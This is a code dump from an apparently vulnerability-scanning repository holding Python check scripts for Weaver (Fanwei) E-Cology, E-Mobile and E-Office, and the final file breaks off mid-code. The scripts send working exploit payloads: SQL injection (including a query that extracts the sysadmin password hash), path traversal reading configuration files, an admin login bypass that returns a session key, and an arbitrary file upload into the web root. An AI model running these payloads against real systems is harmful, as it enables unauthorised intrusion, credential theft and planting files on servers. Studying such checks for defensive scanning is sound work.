/pocs/web/OA/fanwei/ecology/fanwei_ecology_SignatureDownLoad_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
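def verify(url):
    """Probe *url* for the E-Cology SignatureDownLoad SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27")
    try:
        response = requests.get(vurl, headers=headers, timeout=3)
        # Content signal: 200 plus the substring 'cology' in the body.  That substring is
        # common on this product's pages, so a hit here needs confirmation before reporting.
        hit = response.status_code == 200 and 'cology' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result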
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_SptmForPortalThumbnail_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
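def verify(url):
    """Probe *url* for the E-cology 8 SptmForPortalThumbnail.jsp file-read issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/portal/SptmForPortalThumbnail.jsp?preview=../ecology/WEB-INF/prop/weaver.properties")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        # Content signal: 200 plus the literal 'password' in the body; a generic page containing
        # the word would also match, so confirm before reporting.
        hit = response.status_code == 200 and 'password' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result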
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_WorkPlanService_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Probe *url* for the e-cology 9 WorkPlanService time-based SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  When the timing
        signal fires, ``vulnerable`` is True and ``verify`` holds the request URL.
        Any exception (including timeouts) yields the default result.
    """
    relsult = {
        'name': '泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112)',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Content-Type': 'text/xml;charset=UTF-8',
        'Connection': 'close'
    }
    # NOTE(review): the SOAP/XML body appears stripped of its markup in this rendering — only
    # the text nodes survive.  Confirm against the repository copy before relying on this check.
    data='''





(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)

22



'''
    vurl = urllib.parse.urljoin(url, "/services/WorkPlanService")

    try:
        # NOTE(review): no timeout= on this request; an unresponsive host blocks the caller.
        response = requests.post(vurl, headers=headers, data=data)
        # status_code is a non-zero int, so the condition reduces to the timing check: a reply
        # slower than 4 s (the payload sleeps 5 s) counts as a hit.  A slow but unaffected host
        # trips this too, and a 4xx/5xx is not excluded here unlike the sibling checks.
        if response.status_code and response.elapsed.total_seconds() > 4:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult

    except:  # bare except: also swallows KeyboardInterrupt; kept as in the original
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_WorkflowServiceXml_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Probe *url* for the E-Cology WorkflowServiceXml time-based SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  When the timing
        signal fires, ``vulnerable`` is True and ``verify`` holds the request URL.
        Any exception (including timeouts) yields the default result.
    """
    relsult = {
        'name': '泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36',
        'Content-Type': 'text/xml',
        'Accept-Encoding': 'gzip',
        # hard-coded length; requests normally recomputes Content-Length from the actual body
        'Content-Length': '487'
    }
    # NOTE(review): the XML body appears stripped of its markup in this rendering — only the
    # text nodes survive.  Confirm against the repository copy before relying on this check.
    data = '''


1
1
1
1

1=1 AND 2=2;WAITFOR DELAY '0:0:5'



'''
    vurl = urllib.parse.urljoin(url, "/services/WorkflowServiceXml")
    try:
        # NOTE(review): no timeout= on this request; an unresponsive host blocks the caller.
        response = requests.post(vurl, headers=headers, data=data)
        # Timing oracle: a non-4xx reply slower than the 5 s delay counts as a hit; a slow but
        # unaffected host trips this too.  range(400, 499) leaves status 499 un-excluded.
        if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult

    except:  # bare except: also swallows KeyboardInterrupt; kept as in the original
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_XmlRpcServlet_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Probe *url* for the e-cology 9 XmlRpcServlet arbitrary-file-read issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Any exception (including timeouts) yields the default result.
    """
    relsult = {
        'name': '泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
        'Content-Type': 'application/xml',
        'Accept-Encoding': 'gzip',
        # hard-coded length; requests normally recomputes Content-Length from the actual body
        'Content-Length': '201'
    }
    # NOTE(review): the XML-RPC body appears stripped of its markup in this rendering — only
    # the method name and parameter text survive.  Confirm against the repository copy.
    data = '''


WorkflowService.getAttachment


c://windows/win.ini



'''
    vurl = urllib.parse.urljoin(url, "/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet")
    try:
        # NOTE(review): no timeout= on this request; an unresponsive host blocks the caller.
        response = requests.post(vurl, headers=headers, data=data)
        # Content signal: 200 plus the literal 'base64' in the body (the encoding tag the
        # attachment reply is expected to carry)
        if response.status_code == 200 and 'base64' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult

    except:  # bare except: also swallows KeyboardInterrupt; kept as in the original
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_getE9DevelopAllNameValue2_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
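def verify(url):
    """Probe *url* for the getE9DevelopAllNameValue2 arbitrary-file-read issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
        'Accept': '*/*',
        'Connection': 'Keep-Alive',
        'X-Forwarded-For': '127.0.0.1',
        'X-Originating': '127.0.0.1',
        'X-Remote-IP': '127.0.0.1',
        'X-Remote-Addr': '127.0.0.1'
    }
    vurl = urllib.parse.urljoin(url, "/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        # Content signal: 200 plus the literal 'password' in the body; a generic page containing
        # the word would also match, so confirm before reporting.
        hit = response.status_code == 200 and 'password' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result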
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_getLabelByModule_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
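def verify(url):
    """Probe *url* for the e-cology getLabelByModule SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微e-cology接口getLabelByModule存在sql注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        # The original fused "Accept: */*" onto the end of the Content-Type value (a line break
        # lost when the request was pasted); sent as two separate headers as intended.
        'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=aaa')+union+all+select+'1,1123123'+--")
    try:
        response = requests.get(vurl, headers=headers, timeout=3)
        # Content signal: the constant '1123123' selected by the query appears in the body
        hit = response.status_code == 200 and '1123123' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result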
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_getsqldata_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
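def verify(url):
    """Probe *url* for the E-Cology getSqlData SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': 'Weaver-E-Cology-getSqlData-sqli',
        'vulnerable': False,
        'url': url
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version')
    try:
        rep = requests.get(vurl, headers=headers, timeout=timeout)
        # Content signal: 200, the version banner fragment 'Microsoft', and the API's own
        # success marker 'status":true' all present in the body.
        hit = (rep.status_code == 200
               and 'Microsoft' in rep.text
               and 'status":true' in rep.text)
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result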
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_jqueryFileTree_direct.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
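def verify(url):
    """Probe *url* for the E-Cology jqueryFileTree.jsp directory-listing issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微OA-E-Cology-JqueryFileTree.jsp目录遍历漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        # Content signal: 200 plus 'index.jsp' in the body (a listing entry).  A page that
        # merely links to index.jsp would also match, so confirm before reporting.
        hit = response.status_code == 200 and 'index.jsp' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result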
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_setup_unauth.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 |
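def verify(url):
    """Probe *url* for an exposed ecology_dev.zip under the setup path.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  ``vulnerable``
        is True on any HTTP 200 for the archive path, and ``verify`` then holds
        the request URL.  Transport errors and timeouts yield the default result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微ecology系统setup接口存在信息泄露漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/cloudstore/ecode/setup/ecology_dev.zip")
    try:
        # stream=True: only the status line is inspected, so the archive body is never
        # downloaded; the with-block releases the connection when done.
        with requests.get(vurl, headers=headers, timeout=5, stream=True) as response:
            hit = response.status_code == 200
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    # The original also computed int(response.headers['Content-Length']) / 1024 and never used
    # it; on a reply without Content-Length that raised KeyError, which the bare except turned
    # into a silent "not vulnerable" even on a 200.  Dropped.
    # The signal is weak: a catch-all 200 page would also match, so confirm the body really is
    # a zip before reporting.
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result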
27 |
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_v8_sqli.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # 泛微OA V8 前台 SQL注入获取管理员 sysadmin MD5的密码值
3 | # Fofa: app="泛微-协同办公OA"
4 |
5 | import re
6 | import requests
7 | import urllib3
8 | import urllib
9 |
10 |
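def verify(url):
    """Probe *url* for the OA V8 getdata.jsp SQL injection.

    Two requests are made: the first runs the check query, the second selects
    a constant (1234) through the same parameter to confirm that the parameter
    is really being executed rather than echoed.

    Args:
        url: Base URL of the target host; the check paths are joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``user``, ``MD5(password)`` and ``payload``
        are added.  Transport errors and timeouts yield the default result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微OA V8前台Sql注入',
        'vulnerable': False,
        'url': url  # recorded like the sibling checks so reports carry the host
    }
    target_url = urllib.parse.urljoin(url, "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager")
    # was a local named `verify`, which shadowed this function inside its own body
    check_url = urllib.parse.urljoin(url, '/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id')
    headers = {
        "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36"
    }

    try:
        # verify=False below would otherwise emit an InsecureRequestWarning per call
        urllib3.disable_warnings()
        res = requests.get(url=target_url, headers=headers, verify=False, timeout=3)
        v = requests.get(url=check_url, headers=headers, verify=False, timeout=3)
        # 'html' not in res.text rejects ordinary pages; '1234' in v.text is the control
        # (re.search on a literal is a plain substring test)
        hit = res.status_code == 200 and 'html' not in res.text and '1234' in v.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['user'] = 'sysadmin'
        # NOTE(review): the retrieved hash is copied into the result and hence into any report;
        # if reports are stored or shared, consider recording only that the check fired.
        result['MD5(password)'] = res.text.strip()
        result['payload'] = target_url
    return result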
36 |
37 |
38 |
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_verifyquicklogin_loginbypass_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | import urllib, json
4 |
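def verify(url):
    """Probe Weaver E-Cology ``VerifyQuickLogin.jsp`` for the 2022 admin login bypass.

    The JSP is asked for a session with a forged ``identifier``.  A JSON reply
    whose ``message`` is ``"1"`` and that carries a non-empty ``sessionkey``
    is treated as a successful bypass; that key is returned to the caller.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name`` and ``vulnerable``; when vulnerable also
        ``sessionkey`` (the issued token) and ``verify`` (the URL hit).
        Network, JSON or key errors are reported as not vulnerable.
    """
    result = {
        'name': '泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞(2022HVV)',
        'vulnerable': False
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    timeout = 3
    vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp')
    payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x'
    try:
        # The form body has to travel in a POST: servlet containers do not
        # parse a request body as parameters for GET, so the original
        # GET-with-body never delivered ``identifier`` to the JSP.
        rep = requests.post(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data)
        json_rep = rep.json()
        sessionkey = json_rep.get('sessionkey') or ''
        if len(sessionkey) > 0 and json_rep.get('message') == "1":
            result['vulnerable'] = True
            result['sessionkey'] = sessionkey
            result['verify'] = vurl
        return result
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return result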
26 |
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_client_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_client_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_lang2sql_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_lang2sql_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_messageType_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/emobile/__pycache__/fanwei_emobile_messageType_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/emobile/fanwei_emobile_lang2sql_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
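def verify(url):
    """Probe Weaver E-Mobile ``/emp/lang2sql`` for path-traversal file upload.

    A multipart upload whose ``filename`` traverses into Tomcat's ``ROOT``
    webapp is posted; the probe then fetches the dropped marker file over HTTP
    and looks for its content.  NOTE: a vulnerable target is left with
    ``/9SIpL.txt`` in its web root -- clean it up after testing.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (URL of the dropped marker file).  Network failures are
        reported as not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微移动管理平台lang2sql接口任意文件上传',
        'vulnerable': False,
        'url': url
    }
    boundary = '----WebKitFormBoundarymVk33liI64J7GQaK'
    headers = {
        'Content-Type': 'multipart/form-data;boundary=' + boundary,
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Expect': '100-continue',
        'Connection': 'close'
        # No hard-coded Content-Length: requests derives it from the body.
        # The fixed value the original sent (202) did not match the body,
        # which leaves the server waiting for bytes that never arrive.
    }
    # Multipart bodies are CRLF-delimited (RFC 2046); build the body
    # explicitly rather than relying on a triple-quoted literal's LF endings.
    data = '\r\n'.join([
        '--' + boundary,
        'Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/9SIpL.txt"',
        '',
        'b9Q2Itmn1',
        '--' + boundary + '--',
        '',
    ])
    vurl = urllib.parse.urljoin(url, "/emp/lang2sql?client_type=1&lang_tag=1")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=5)
        if response.status_code == 200 and '未知异常' in response.text:
            vurl = urllib.parse.urljoin(url, "/9SIpL.txt")
            # Plain GET for the marker; the multipart headers belong to the
            # upload only.
            response = requests.get(vurl, headers={'User-Agent': headers['User-Agent']}, timeout=5)
            if response.status_code == 200 and 'b9Q' in response.text:
                relsult['vulnerable'] = True
                relsult['verify'] = vurl
        return relsult
    except Exception:
        # Best-effort probe; ``Exception`` (not bare) keeps Ctrl-C working.
        return relsult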
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_OfficeServer_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_OfficeServer_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UploadFile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UploadFile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UserSelect_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_UserSelect_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_atuh-file_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_atuh-file_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_config_2_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_config_2_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_json_common_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_json_common_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_jx2_config_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_jx2_config_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_leave_record_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_leave_record_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_login_other_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_login_other_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_mobile_upload_save_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_mobile_upload_save_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_schema_mysql_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_schema_mysql_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_uploadify_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_uploadify_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_webservice_file_upload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/eoffice/__pycache__/fanwei_eoffice_webservice_file_upload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/eoffice/fanwei_eoffice_OfficeServer_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
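def verify(url):
    """Probe Weaver E-Office 10 ``iWebOffice2015/OfficeServer.php`` for arbitrary file upload.

    A multipart request with a ``FileData`` part and a ``FormData`` part
    (``OPTION: SAVEFILE``, ``FILENAME: test112.php``) is posted, then the
    saved file is fetched from the ``Document`` directory and its body is
    checked for ``PHP``.  NOTE: a vulnerable target is left with
    ``Document/test112.php`` on disk -- remove it after testing.

    NOTE(review): the ``FileData`` part is sent empty, as in the original, so
    the ``'PHP' in response.text`` test on the fetched file is unlikely to
    match -- confirm what content the verification step actually expects.

    Args:
        url: Base URL of the target.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; when vulnerable also
        ``verify`` (URL of the uploaded file).  Network failures are reported
        as not vulnerable instead of being raised.
    """
    relsult = {
        'name': '泛微E-Office10-OfficeServer任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    boundary = '----WebKitFormBoundaryJjb5ZAJOOXO7fwjs'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        # The body is multipart, so the request Content-Type must name the
        # boundary; the original sent "image/jpeg" (the part's type) here,
        # which PHP does not parse into $_FILES/$_POST at all.  No hard-coded
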